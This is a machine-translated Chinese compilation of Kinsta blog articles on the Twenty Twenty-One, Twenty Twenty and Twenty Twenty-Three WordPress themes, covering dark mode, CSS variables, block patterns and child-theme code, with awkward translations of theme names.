- 启用黑暗模式后,网站浏览者可以根据个人喜好打开/关闭黑暗模式,而不考虑操作系统/浏览器设置。
Dark mode enabled in the Customizer and disabled on the front site
即使黑暗模式被认为是一种可访问性的改进,也不清楚你的站点页面在任何上下文中都更容易访问。
最大的担忧与深色标识和透明图像有关。从默认的浅色模板切换到深色背景可能会导致可读性问题,这可能会降低可用性并破坏网站的外观。
例如,如果您的读者启用了深色模式,浅色背景上的深色徽标可能会完全消失。类似的问题涉及图像亮度和对比度以及边框、分割线和分隔符的不透明度。
出于这个原因,如果你打算为你的网站提供黑暗模式支持,你也应该考虑你的网站在黑暗背景下会是什么样子。
Dark mode enabled in the Customizer and enabled on the front site
主题贡献者知道这些问题,讨论在 Github 上继续。为了更深入地了解黑暗模式可用性问题并有机会参与讨论,请查看 Github 上的完整问题列表。
黑暗模式首选项存储在 LocalStorage 中,可以在浏览器的开发人员工具中查看。
在谷歌 Chrome 中,启动 Chrome WebTools,点击应用标签。找到存储部分,展开本地存储菜单。
Dark Mode user preferences in Brave Browser local storage
说实话,黑暗模式在今天的网站背景下并不是一个常见的东西。然而,由于新的 WordPress 默认主题现在支持黑暗模式,我们可以预期在这个特定的可访问性领域会有所改变,因为 WordPress 是最常用的 CMS 软件。
想要更深入了解技术的开发者不应该错过这个关于网络黑暗模式的深度指南。
样式和 CSS 自定义属性
也就是说,现在是时候为主题开发者探索 Twenty Twenty 1 最有趣的特性了。
让我们从 CSS 自定义属性开始。
如上所述,Twenty Twenty One 基于 Seedlet ,一个两栏主题,带有页脚侧边栏和三个菜单位置。Seedlet 的风格完全基于 CSS 自定义属性,这使得主题开发者和高级用户更容易在 Automattic 的主题上构建子主题。
同样是 221 的。新的默认主题带有一个单列布局、一个页脚侧边栏和两个菜单位置。样式表反映了 Seedlet 提供的嵌套定制属性系统,这使得 Twenty Twenty One 成为构建子主题和高度定制的网站的完美画布。
CSS 自定义属性(也称为 CSS 变量)是包含特定值的特殊实体,可以在样式表的任何地方重用。
因此,如果需要在文档中更改特定的颜色强调,不需要运行全局搜索来查找样式表中出现的任何颜色。你只需要在:root 块内设置一个不同的属性值。
CSS custom properties in Twenty Twenty-One
作为简单定制的一个例子,假设您想要设置一个定制的背景颜色。您不需要为此构建子主题。你只需要在 附加 CSS 面板的代码编辑器中包含两个 CSS 声明:
:root {
--global--color-beige: #e6d7c1;
}
body {
background-color: var(--global--color-beige);
}
Custom CSS in Twenty Twenty-One Customizer
CSS 自定义属性可以安全使用,因为所有主流浏览器都支持它们,如下图所示,来自我可以使用吗:
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
CSS custom properties are supported by the majority of modern web browsers
如果您想更深入地了解 CSS 自定义属性,请查看 MDN 文档。
二十个二十一个积木图案
221 为块编辑器提供了几种模式。在之前的博客文章中,我们将块模式定义为预定义的块布局,允许用户快速将复杂的嵌套块结构添加到他们的页面。
WordPress 5.5 引入了一些区块模式,更多应该会出现在 WordPress 5.6 中。此外,221 有自己的一套积木图案。
在二十二十一中,块模式是在 inc/block-patterns.php 文件中定义的。21 种模式各不相同,从包含单个 H2 元素的简单模式大文本到更复杂的模式,如重叠图像和文本和媒体和文本文章标题。
Media and Text Article Title block pattern in Twenty Twenty-One
目前,该主题提供了以下模式:
- 大文本
- 链接区:一个巨大的文本,后面是社交网络和电子邮件地址链接。
- 媒体和文本文章标题:一个媒体&文本块,左边是大图,右边是标题。标题后面是分隔符和描述段落。
- 重叠图像:重叠列块内的三幅图像。
- 两个图像展示:一个媒体 &文本块,左边是一个大图像,右边是一个带边框的小图像。
- 重叠图像和文本:一个重叠的列块,有两个图像和一个文本描述。
- 作品集列表:带有缩略图的项目列表。
- 联系信息:一个有 3 列的区块,显示联系信息和社交媒体链接。
Overlapping Images block pattern in Twenty Twenty-One
这么多块模式的可用性对用户和开发人员来说都很好。用户将被允许快速方便地在他们的文章和页面中添加复杂的代码块,开发者可以使用这些模式作为有用的模板来编写他们自己的代码。
221 块实验
221 街区是 221 主题的一个独立的基于街区的实验版本。它的目的是分享并让每个人都了解整个网站编辑实验的最新进展,让每个人在成为 WordPress Core 的一部分之前都有机会深入了解 FSE 的新功能。
我们不太可能看到这个实验版本与 WordPress 5.6 合并成 core。据卡罗来纳·尼马克,
该主题将需要古腾堡和完整的网站编辑实验被启用。它不会是核心的一部分,但是一旦完成,它将出现在主题目录中。
在撰写本文时,221 块需要古腾堡插件。一旦安装并激活了主题和插件,一个站点编辑器菜单项就会出现在你的 WordPress 管理菜单中(你不再需要激活完整的站点编辑实验)。
The Site Editor menu item in Twenty Twenty-One Blocks experiment
现在,点击新的站点编辑器菜单项,打开全站点编辑界面,开始使用块编辑器编辑页面上的任何元素。
Full Site Editing in Twenty Twenty-One Blocks
在这里,我们不会陷入技术的东西。可以说,经典主题和基于块的主题在结构上是不同的。
下图显示了二十个二十一个街区文件夹的内容:
Twenty Twenty-One Blocks folder
你会注意到 experimental-theme.json 文件和块模板和块模板部件文件夹。
传统 WordPress 主题和基于块的主题的主要区别在于,基于块的主题包括完全由块组成的模板。
例如,在您的代码编辑器中打开block-template-parts/header . html。您应该会看到以下代码:
<!-- wp:spacer {"height":70} -->
<div style="height:70px" aria-hidden="true" class="wp-block-spacer"></div>
<!-- /wp:spacer -->
<!-- wp:columns {"align":"wide"} -->
<div class="wp-block-columns alignwide"><!-- wp:column -->
<div class="wp-block-column"><!-- wp:site-title /-->
<!-- wp:site-tagline /--></div>
<!-- /wp:column -->
<!-- wp:column -->
<div class="wp-block-column"><!-- wp:navigation {"orientation":"horizontal","itemsJustification":"right"} -->
<!-- wp:navigation-link {"label":"Home","url":"#"} /-->
<!-- wp:navigation-link {"label":"Blog","url":"#"} /-->
<!-- wp:navigation-link {"label":"Work","url":"#"} /-->
<!-- wp:navigation-link {"label":"Contact","url":"#"} /-->
<!-- /wp:navigation --></div>
<!-- /wp:column --></div>
<!-- /wp:columns -->
<!-- wp:spacer {"height":70} -->
<div style="height:70px" aria-hidden="true" class="wp-block-spacer"></div>
<!-- /wp:spacer -->
可以看到,经典的header.php 模板文件已经被一个所取代。包含几个块的 html* 文件。*
*你可以从 Github 上的主题-实验项目中获取正在进行的二十个二十一个街区主题的版本。
如果你是一个主题开发者,官方文档提供了你需要知道的关于基于块的主题的所有信息。
如果你愿意为整个网站编辑实验做贡献,请在这里提交你的反馈。
重要的
二十个二十一块是实验主题,不应该用于生产!在舞台环境中摆弄它。
如何在 2021 年建立一个儿童主题
默认的 WordPress 主题是学习主题开发的基础,并让你开始构建自定义子主题的好起点。
默认主题遵循官方的 WordPress 编码标准的指导方针,并且符合 T2 的网络标准。
有没有更好的地方让学习编码?
需要为您的客户站点提供超快的、安全的、开发人员友好的托管服务吗?Kinsta 是为 WordPress 开发者设计的,提供了大量的工具和强大的仪表板。查看我们的计划
子主题是一个很棒的 WordPress 特性,它允许你自定义页面的布局、功能和结构。通过下面的例子,我们将深入主题定制的各个方面。
设置您的儿童主题
构建 WordPress 子主题有三个步骤:
1.创建子主题文件夹
在 wp-content/themes 中创建一个新文件夹,根据需要命名。但是请记住,它应该是一个唯一的名称。子主题手册建议使用与父主题相同的名称,并在末尾添加-子主题。
因此,我们可以将新文件夹命名为 twentytwentyone-child 。
2.创建 style.css 文件
现在移动到你的子主题目录,创建一个新的 style.css 文件,包括以下代码:
/*
Theme Name: My Twenty Twenty One Child Theme
Theme URI: https://example.com
Description: A child theme for Twenty Twenty One.
Author: Your Name
Author URI: https://example.com/
Template: twentytwentyone
Version: 1.0
License: GNU General Public License v2 or later
License URI: https://www.gnu.org/licenses/gpl-2.0.html
*/
信息标题允许 WordPress 正确处理你的子主题。
- 主题名称:主题的唯一名称。
- 主题 URI:用户可以在这里找到主题的代码或文档。
- 描述:帮助用户理解主题的描述性文字。
- 作者:你的名字
- 作者 URI:作者的网站。
- 模板:存储父主题的文件夹。使用文件夹名称,而不是主题名称。没有这一行,你的主题就不能作为子主题。
- 版本:版本号
- License:许可证,其中必须是 GNU 。
- URI 许可证:许可证信息的链接。
在该文本下面,您可以添加您的 CSS 声明块,稍后我将向您展示。
3.创建一个 functions.php 文件
有了 221,你还需要一个functions.php文件。因此,在子主题的目录中创建您自己的目录,在代码编辑器中打开它,并添加以下代码:
<?php
/* enqueue scripts and style from parent theme */
function twentytwentyone_styles() {
wp_enqueue_style( 'child-style', get_stylesheet_uri(),
array( 'twenty-twenty-one-style' ), wp_get_theme()->get('Version') );
}
add_action( 'wp_enqueue_scripts', 'twentytwentyone_styles');
因为 Twenty Twenty-One 主题使用get_template_directory()来加载它的样式表,所以您需要使用wp_enqueue_scripts动作将子主题的样式表排队。
之后,保存你的文件,打开你的 WordPress 仪表盘,浏览到外观- >主题,激活你的 Twenty Twenty One 的子主题。
现在让我们添加我们的定制。
如何添加自定义样式
当谈到定制你的 WordPress 网站的布局时,你有几个选择来添加你的定制 CSS 代码。定制者的额外的 CSS 面板对于小改动来说已经足够了。
但是如果你必须进行高级定制,或者你需要将你的代码导出到不同的 WordPress 网站,子主题会是一个更好的选择。
让我们尝试一下简单的定制:改变默认的字体堆栈。
假设你想加载一个不同的字体堆栈,或者简单地将你最喜欢的字体添加到默认的 21 种字体中。
你是怎么做到的?
在这里我将向你展示如何改变 H1 标题的默认字体,但是你可以为你网站的任何文本元素改变字体系列。
首先,打开第二十一的 style.css 文件,找到下面的 css 块:
h1,
.h1,
h2,
.h2,
h3,
.h3,
h4,
.h4,
h5,
.h5,
h6,
.h6 {
clear: both;
font-family: var(--heading--font-family);
font-weight: var(--heading--font-weight);
}
如您所见,标题的字体系列是在--heading--font-family变量中设置的。
现在转到:root{}块,找到下面的声明:
--heading--font-family: var(--global--font-primary);
--heading--font-family依赖于--global--font-primary变量,该变量定义在:root{}块的最顶端:
:root{
/* Font Family */
--global--font-primary: var(--font-headings, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif);
...
}
现在我们知道要改变什么了!
从父样式表中复制--global--font-primary声明,粘贴到子样式表的 style.css 中。然后,更改属性名称和值,如下所示:
:root{
/* Font Family */
--global--font-primary-child: var(--font-headings, Ubuntu, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Cantarell, "Helvetica Neue", sans-serif);
--global--font-family-child: var(--global--font-primary-child);
}
一旦声明了自定义字体堆栈,就可以在样式表中的任何地方使用它。我们例子中的 H1 标题:
h1,
.h1 {
font-family: var(--global--font-family-child);
}
保存孩子的 style.css ,重新加载页面。你应该看到 Ubuntu 作为你的页面标题的默认字体系列。
Default font family vs. custom font family in Twenty Twenty-One
既然您已经知道如何使用子主题自定义 Twenty Twenty-One 的样式,我们可以探索更多高级功能。
如何添加新的积木图案
在本例中,我们将构建一个定制的块模式,包括一个两列块,左边是一个圆形图像,右边是一个 H4 标题和一个段落。
您可以直接在块编辑器中构建您的模式,或者定制现有块模式的代码。
如果您选择在块编辑器中构建您的模式,您只需要将必要的块添加到帖子或页面草稿中,然后切换到代码编辑器并复制相应的代码。
A two-column block in the Code Editor
我们现在可以在子主题的functions.php文件中注册我们的模式:
add_action( 'init', function(){
register_block_pattern_category(
'custom-patterns',
array( 'label' => esc_html__( 'Custom patterns', 'twentytwentyone-child' ) ) );
register_block_pattern(
'twentytwentyone-child/custom-bio-pattern',
array(
'title' => __( 'Author Bio', 'twentytwentyone-child' ),
'description' => _x( 'A block with 2 columns that displays an avatar image, a heading and a paragraph.', 'Block pattern description', 'twentytwentyone-child' ),
'content' => '<!-- wp:columns {"verticalAlignment":null} --> <div class="wp-block-columns"><!-- wp:column {"verticalAlignment":"center","width":"33.33%"} --> <div class="wp-block-column is-vertically-aligned-center" style="flex-basis:33.33%"><!-- wp:image {"id":29,"sizeSlug":"large","linkDestination":"none","className":"is-style-rounded"} --> <img src="' . esc_url( get_stylesheet_directory_uri() ) . '/asseimg/Kinsta-logo.png" alt="Kinsta" /> <!-- /wp:image --></div> <!-- /wp:column --> <!-- wp:column {"width":"66.66%"} --> <div class="wp-block-column" style="flex-basis:66.66%"><!-- wp:heading {"level":4} --> <h4>About Kinsta</h4> <!-- /wp:heading --> <!-- wp:paragraph --> <p>Kinsta was founded in 2013 with a desire to change the status quo. We set out to create the best hosting platform in the world, and that’s our promise. We don’t settle and are here to stay.</p> <!-- /wp:paragraph --></div> <!-- /wp:column --></div> <!-- /wp:columns -->',
'categories' => array( 'custom-patterns' ),
)
);
});
上面的代码注册了自定义模式类别和作者简介模式。
注意我们用来构建img元素的代码:
<img src="' . esc_url( get_stylesheet_directory_uri() ) . '/asseimg/Kinsta-logo.png" alt="Kinsta" />
get_stylesheet_directory_uri() 函数提供子主题目录的 URI(该图像之前已经添加到子主题的资产文件夹中)。
保存您的更改并创建新的帖子或页面。
现在,您应该在块插入器中找到新的模式。
A custom block pattern added to Twenty Twenty-One
自定义模板文件
如果你想为一个特定的文档或单个文章/页面创建一个新的模板文件,你需要创建一个新的。php 模板按照 WordPress 模板的层次结构。
但如果你只想编辑一个已有的模板(或模板部分),你只需要从父主题中复制原始模板,并粘贴到你的子主题的相应位置(在我们的子主题扩展指南中阅读更多关于这个主题的内容)。
假设你想定制“由 WordPress 提供动力的骄傲”文本。您有几个选项来删除或定制该行。对于我们的例子,让我们手动更改它。
为此,从父文件夹中复制footer.php模板文件并粘贴到你的子主题的根目录中。完成后,在代码编辑器中打开子主题的footer.php,找到以下代码:
<div class="powered-by">
<?php
printf(
/* translators: %s: WordPress. */
esc_html__( 'Proudly powered by %s.', 'twentytwentyone' ),
'<a href="' . esc_attr__( 'https://wordpress.org/', 'twentytwentyone' ) . '">WordPress</a>'
);
?>
</div><!-- .powered-by -->
现在,您可以进行更改了。比方说,你想给你的网络主机积分,只需替换如下所示的a元素:
<div class="powered-by">
<?php
printf(
esc_html__( 'Proudly powered by %s.', 'twentytwentyone' ),
'<a href="https://kinsta.com/">Kinsta</a>'
);
?>
</div><!-- .powered-by -->
要删除该文本,只需注释掉或删除div.powered-by元素:
<!-- <div class="powered-by">
<?php
printf(
/* translators: %s: WordPress. */
esc_html__( 'Proudly powered by %s.', 'twentytwentyone' ),
'<a href="' . esc_attr__( 'https://wordpress.org/', 'twentytwentyone' ) . '">WordPress</a>'
);
?>
</div> -->
仅此而已。现在,从上面的简单例子开始,你可以进行更令人兴奋的定制,将你的网站提升到一个新的水平。
摘要
221 主题是第三次尝试允许没有高级技术技能的人建立网站。这是一个极简主义的、性能良好的、可访问的 WordPress 主题,也适合广泛的用例。由 Twenty 221 主题驱动的 WordPress 站点有各种形状和大小。要想知道一个主题是否在使用 Twenty Twenty One,请查看我们方便的主题检测工具。
考虑到块编辑器的设计,新的默认主题便于用户和开发人员自定义。
现在轮到你了:你安装了 221 主题了吗?你对它有什么体验?在评论区分享你的想法吧!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。*
二十二十:新的默认 WordPress 主题介绍
220 是 WordPress 5.3 最新版本的的新默认主题。像它的前身二十十九一样,二十二十被设计成特别关注古腾堡。不过,这两者之间有一个很大的区别:220 不是从头开始建造的;相反,它是基于 WordPress 社区的现有主题设计的。
由于我们热爱 WordPress 的一切,我们仔细研究了新的 Twenty Twenty 主题,查看了 function.php 文件、样式表和模板。
即使 Twenty Twenty 还远未稳定——在我写这篇文章的时候——许多问题还没有解决,今天我们将与你分享我们对新的默认 WordPress 主题的最初想法。
让我们深入到 Twenty Twenty WordPress 主题!
二十二十 WordPress 主题预览(图片来源:制作 WordPress 核心 )
快速介绍 2220 主题
Twenty Twenty 建立在 Chaplin T1 的基础上,这是一个免费的 WordPress 主题,由 T2 的 Anders norén T3 设计,他也是 WordPress 5.3 的默认主题设计负责人。
Chaplin 可以在 WordPress.org 的库中下载,据 Anders 称,它是在考虑了块编辑器的情况下构建的:
需要在这里大声喊出来。Kinsta 太神奇了,我用它做我的个人网站。支持是迅速和杰出的,他们的服务器是 WordPress 最快的。
Chaplin 是一个功能丰富的 WordPress 主题,可以让你完全控制网站上的 HTML 字体和颜色。它是从零开始构建的,考虑到了新的块编辑器,可以很容易地在帖子和页面上创建好看的布局。
Chaplin WordPress theme
同样的理念也存在于 Twenty Twenty 的背后:灵活性、清晰、和可读性是新主题的重点关键词。
Twenty Twenty 带有一个单列布局和三个帖子/页面模板,旨在让 WordPress 管理员和设计者自由地直接在块编辑器中创建他们的定制布局,利用宽和全对齐的块元素,如列、图像和古腾堡 5.5 引入的组块。
正如安德斯解释的那样:
Twenty Twenty 的设计核心是灵活性。如果您想将其用于组织或企业,您可以将栏、组和媒体与宽对齐和完全对齐相结合,以创建动态布局来展示您的服务或产品。如果你想把它用于传统的博客,居中的内容栏也非常适合。
除此之外,Twenty Twenty 还有一个新的字体: Inter 。这是一个由 Rasmus Andersson 设计的免费开源字体系列,专门用于混合大小写文本的可读性,尤其是小字体。
The Inter typeface family
国际米兰赋予了大标题更强的个性,但当你使用交替的文本大小时,你会得到最大的好处,正如 WordPress.org 博客帖子的主题预览所示:
Twenty Twenty typography: impact and readability
Twenty Twenty 不仅仅是一个功能齐全的主题,还是一个标志着 WordPress 编辑界面未来发展的重要新步骤的主题。Twenty Twenty 主要依靠块编辑器来编辑和布局内容,并依靠主题定制器来进行页眉、页脚和其他定制。
也就是说,是时候让我们安装这个 WordPress 主题并运行它了。
T3】
如何安装 two two
即将到来的默认主题将遵循 WordPress 5.3 发布计划。这意味着,在我写这篇文章的时候,Twenty Twenty 仍然不能在 WordPress 主题目录中下载。
反正你可以在 GitHub 上下载一个正在进行中的 Twenty Twenty 版本,安装在 WordPress 当前的稳定版本中或者用 WordPress 5.3 获取。一旦主题合并到核心中,Github 储存库将被弃用。同时,你可能想保存 WordPress 5.3 发布时间表中的以下日期:
- 2019 年 9 月 23 日:Beta 1
- 2019 年 9 月 30 日:Beta 2
- 2019 年 10 月 7 日:Beta 3
- 2019 年 10 月 15 日:发布候选 1
- 2019 年 10 月 22 日:发布候选 2
- 2019 年 10 月 29 日:发布候选 3
- 2019 年 11 月 5 日:发布候选 4(如果需要)
- 2019 年 11 月 12 日:WordPress 5.3 发布的目标日期。
要开始使用 Twenty Twenty,请遵循以下步骤:
- 从 GitHub 获取压缩包。
- 在 WordPress 仪表盘或通过 SFTP 上传 zip 文件到你的开发安装中。
- 浏览到外观→主题,点击主题预览图像上的激活按钮。
- 进入外观→自定义配置二十二十。
就是这样!你现在可以开始在你的试运行网站或者你的本地环境上运行你的测试。
重要的
Twenty Twenty 目前正在开发中,许多问题还没有解决。你不应该在生产中使用它。
An open issue on GitHub
现在你已经准备好了,让我们继续前进,进入主题。
在发布到产品之前,使用我们的发布网站轻松测试 WordPress 主题。免费试用 kin sta。【T7
Twenty Twenty 的主题功能
Twenty Twenty 不是一个功能齐全的主题,而是一个精简的最小化主题,旨在给 T2 开发者和网站管理员为他们的帖子和页面建立自定义内容布局的自由。与Twenty Twenty 19一样,Twenty Twenty 也是为古腾堡打造的,主要取决于古腾堡的生命周期(关于这个主题的更多信息,请参见 WCEU 2019 上马特·莫楞威格的视频)。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
该主题支持许多主题特性,如内容宽度(580)、自动提要链接、文章缩略图、标题标签和一些 HTML5 元素(搜索表单、评论表单、评论列表、图库和标题)。
其他功能为主题定制器增加了选项。其中包括定制背景和定制 logo 。下面的代码片段展示了主题的函数文件中启用的这些特性:
// Custom background color
add_theme_support(
'custom-background',
array(
'default-color' => 'F5EFE0'
)
);
// Custom logo
add_theme_support(
'custom-logo',
array(
'height' => 240,
'width' => 320,
'flex-height' => true,
'flex-width' => true,
'header-text' => array( 'site-title', 'site-description' ),
)
);
The Theme Customizer in Twenty Twenty
Twenty Twenty 还支持一些古腾堡的特定功能。首先,主题支持宽和全幅对齐:
// Add support for full and wide align images.
add_theme_support( 'align-wide' );
如果用户在定制器中设置了强调色,则编辑器调色板被启用(默认启用):
// If we have accent colors, add them to the block editor palette
if ( $editor_color_palette ) {
add_theme_support( 'editor-color-palette', $editor_color_palette );
}
Customizing colors in Twenty Twenty
Twenty Twenty 主题带有四种编辑器字体大小,在块编辑器中可用:
// Gutenberg Font Sizes
add_theme_support( 'editor-font-sizes', array(
array(
'name' => _x( 'Small', 'Name of the small font size in Gutenberg', 'twentytwenty' ),
'shortName' => _x( 'S', 'Short name of the small font size in the Gutenberg editor.', 'twentytwenty' ),
'size' => 16,
'slug' => 'small',
),
array(
'name' => _x( 'Regular', 'Name of the regular font size in Gutenberg', 'twentytwenty' ),
'shortName' => _x( 'M', 'Short name of the regular font size in the Gutenberg editor.', 'twentytwenty' ),
'size' => 18,
'slug' => 'regular',
),
array(
'name' => _x( 'Large', 'Name of the large font size in Gutenberg', 'twentytwenty' ),
'shortName' => _x( 'L', 'Short name of the large font size in the Gutenberg editor.', 'twentytwenty' ),
'size' => 24,
'slug' => 'large',
),
array(
'name' => _x( 'Larger', 'Name of the larger font size in Gutenberg', 'twentytwenty' ),
'shortName' => _x( 'XL', 'Short name of the larger font size in the Gutenberg editor.', 'twentytwenty' ),
'size' => 32,
'slug' => 'larger',
),
) );
Font sizes in the editor’s block Text settings
仅此而已。这个主题在功能上也很简单,但是它可以很容易地用一个子主题来扩展,我们一会儿将深入讨论这个主题。
如何定制二十个二十的外观
Twenty Twenty 没有任何花哨的功能,但在与 Gutenberg(或一个好的页面生成器)配合使用时,它提供了很大的灵活性。
定制 Twenty Twenty 主题
站点标识处理站点标题以及标语、徽标和图标。您可以在定制器的站点标识部分启用/禁用所有这些元素:
Site Identity in Customizer’s settings
定制器的封面模板部分处理封面模板页面模板的定制设置。在那里,你会发现:
- 在背景图像(固定背景图像)上启用视差效果的选项。
- 颜色选择器,为特色图像覆盖设置自定义背景颜色和文本颜色。
- 控制叠层不透明度的滑块。
The Cover Template section in the Customizer
菜单部分提供了五个菜单位置。您可以在标题中包含常规水平菜单(桌面水平菜单)和/或可切换导航菜单(桌面扩展菜单)。移动菜单为移动设备专用菜单,页脚菜单和社交菜单位于页面页脚。
Menu locations in Twenty Twenty
页脚处理页脚菜单和社交菜单位置以及两个小部件区域。下图显示了主题的页脚及其所有元素:
Template footer in Twenty Twenty
最后,附加 CSS 部分允许您包含自定义样式。
单个帖子/页面模板
说到文章和页面布局,您可以从三个不同的模板中进行选择。除了默认模板之外,Twenty Twenty 还提供了一个封面模板和一个全幅模板,你可以使用它们来自定义你的内容的外观和感觉。
Single Post/Page templates in Twenty Twenty
2020 年的街区编辑
由于其最小化的方法,Twenty Twenty 的外观主要依赖于块编辑器。我们使用 Gutenberg 版本 6.4.0 在 Twenty Twenty 上运行我们的测试。这个版本提供了大量的新特性、增强功能和错误修复,极大地改善了编辑体验。
在发布到产品之前,使用我们的发布网站轻松测试 WordPress 主题。免费试用 kin sta。
有些块会派上用场,尤其是在构建单页网站的时候。像媒体&文字和封面这样的区块已经得到改进,现在在展示产品和/或专业作品集时看起来很棒:
Media & Text block (full-with alignment)
尽管如此,由于 Gutenberg 是一个正在进行的项目,你可能想看看一些最流行的插件,允许在编辑器中添加更多的块。
以下是值得一试的插件列表:
主题定制器和块编辑器在外观和布局定制方面做得很好,但是子主题可以让您更好地控制页面的外观和感觉。
如何为 Twenty Twenty 主题创建子主题
为 WordPress 构建子主题可能很有趣,也是开始职业生涯的一个好方法,作为一个 WordPress 主题开发者,Twenty Twenty 可能是一个很好的父主题。那么,你为什么不试试呢?😉
如果你不知道从哪里开始创建子主题,一定要看看我们的扩展指南如何在 WordPress 中创建子主题。
现在,让我们为 2020 建立我们的第一个孩子主题!
在wp-content/themes下创建一个新目录,并将其命名为twentytwenty-child或任何您喜欢的名称。
浏览到wp-content/themes/twentytwenty-child并创建一个新的style.css文件,标题如下:
/*
Theme Name: My Twenty Twenty Child Theme
Theme URI: https://example.com
Description: A child theme for Twenty Twenty.
Author: Your Name
Author URI: https://example.com/
Template: twentytwenty
Version: 1.0
License: GNU General Public License v2 or later
License URI: https://www.gnu.org/licenses/gpl-2.0.html
*/
接下来,我们必须包含父主题的样式表。在同一个目录中,创建以下functions.php文件:
<?php
/* enqueue scripts and style from parent theme */
function twentytwenty_styles() {
wp_enqueue_style( 'parent', get_template_directory_uri() . '/style.css' );
}
add_action( 'wp_enqueue_scripts', 'twentytwenty_styles');
现在进入外观→主题并激活您的儿童主题。现在,您可以开始进行定制了。
Activate the child theme
在 Twenty Twenty 中你几乎可以改变任何东西,从添加自定义模板到添加你的自定义样式或者改变主题的默认样式。
在这里,我将向您展示如何为单个帖子和页面创建一个新的自定义模板。
在 Twenty Twenty 中添加自定义帖子/页面模板
到目前为止,我们已经为 Twenty Twenty 创建了一个子主题,并将父样式附加到子主题的样式表中。在下面的例子中,我们将去掉页眉和页脚,为 post/page 模板文件中的页面主体腾出空间。
第一步
将下列文件从父主题复制并粘贴到子主题的目录中:
- templates/template-full-width . PHP
- header.php
- footer.php
第二步
将template-full-width.php改名为template-canvas.php(或者你喜欢的任何名字)。打开文件,删除当前内容,然后粘贴以下内容:
<?php
/*
Template Name: Canvas Template
Template Post Type: post, page
*/
get_template_part( 'singular' );
模板名称设置你将在块编辑器中看到的模板文件的名称,而模板帖子类型定义支持该模板文件的帖子类型。get_template_part函数从父主题中加载singular.php文件(在我们的子主题中不需要这个文件的副本)。
转到 WordPress 仪表盘,创建一个新帖子。现在你应该在文章属性部分找到一个额外的页面模板。
A new template is available in Post Attributes
第三步
现在有趣的部分来了。在您最喜欢的文本编辑器中打开header.php,并将header元素包含在下面的if语句中:
<?php
if ( ! is_page_template( array( 'templates/template-canvas.php' ) ) ) {
?>
<header id="site-header" class="header-footer-group" role="banner">
...
</header><!-- #site-header -->
<?php
// Output the menu modal
get_template_part( 'template-parts/modal-menu' );
}
这段代码检查页面模板的是否不是templates/template-canvas.php。如果页面模板是 templates/template-canvas.php,那么它不会包含站点页眉和模态菜单。
类似地,当活动页面模板是我们的画布时,我们可以从文章页面中移除页脚。只需在footer.php中添加相同的条件,如下所示:
<?php
if ( ! is_page_template( array( 'templates/template-canvas.php' ) ) ) {
?>
<footer id="site-footer" role="contentinfo" class="header-footer-group">
...
</footer><!-- #site-footer -->
<?php } ?>
<?php wp_footer(); ?>
</body>
</html>
你可以在这里下载这个例子的代码。
现在创建一个新的帖子或页面,在帖子/页面属性中选择画布模板,查看前台页面。
摘要
Twenty Twenty 是一个极简主义的 WordPress 主题,采用单列布局。我们使用它的方式主要取决于块编辑器的发展。正如安德斯富于表情地说:
“块编辑器的承诺是让用户自由地设计和构建他们认为合适的站点”。
继Twenty 19之后,新的 Twenty 20 默认主题是新一代主题中的第二个,旨在“允许无需手动代码编辑即可构建网站”。由 Twenty Twenty 主题驱动的 WordPress 网站有各种形状和大小。要想知道一个主题是否在使用 Twenty Twenty,请查看我们方便的 WordPress 主题检测工具 。
如果你认为 Gutenberg 对你的项目来说还不完全可靠,你可以添加你需要的插件,比如上面列出的插件。或者,简单地说,你可以拥抱一个第三方页面生成器。
现在由你决定:安装新的默认 WordPress 主题,使用它,并在评论中告诉我们你的想法!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
223:来自社区的一个新的默认主题
223 是 WordPress 6.1 推出的全新默认主题。
这是一个没有图片或附加功能的极简主义主题。它尽最大努力作为一个开始主题来构建模板和风格变化,并测试 WordPress 最新版本引入的所有功能。这个主题可以被视为一个真正的开发和测试环境,尽管极简风格、响应性和轻便性使它成为创建适合各种用途的博客和网站的一个好选择。
在他对 222 个主题的介绍中,Kjell Reigstad 谈到了 T2 默认主题的未来:
像 theme.json、块模板和块模式这样的创新使得主题开发变得更加简单,并且为用户定制他们的站点提供了新的方法。有理由相信,在未来几年,社区可以利用所有这些为我们的用户构建更频繁、更多样的主题和定制解决方案。
Channing Ritter 提出了以下建议:
如果我们不强调主题本身,而是强调一组由社区成员设计的固执己见的风格变化,会怎么样?我们可以使用 Twenty Twenty 2 作为一个新主题的基础,这个主题是精简的,是一个空白的画布,让各种风格的变化闪闪发光。
这就是新的 223 默认主题所发生的事情。社区被号召积极参与设计默认的 WordPress 主题,我们喜欢这样,因为它使新的主题成为真正参与性工作的结果。
Twenty Twenty-Three preview
但是在揭示新的 WordPress 默认主题的风格变化之前,让我们先了解一下 Twenty Twenty 3 的基本特征和它的适用范围。
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
页面布局和样式
如上所述,223 是 222 的精简版。新的默认主题最引人注目的是它的简单和轻便。223 是灵活的,非常适合古腾堡最新的网站编辑功能,如模板编辑、全球风格变化、流体排版和块模式。
因此,毫不奇怪,在本文的截图中,您将看到最少的页面,没有任何花哨的功能,但非常适合定制和测试。
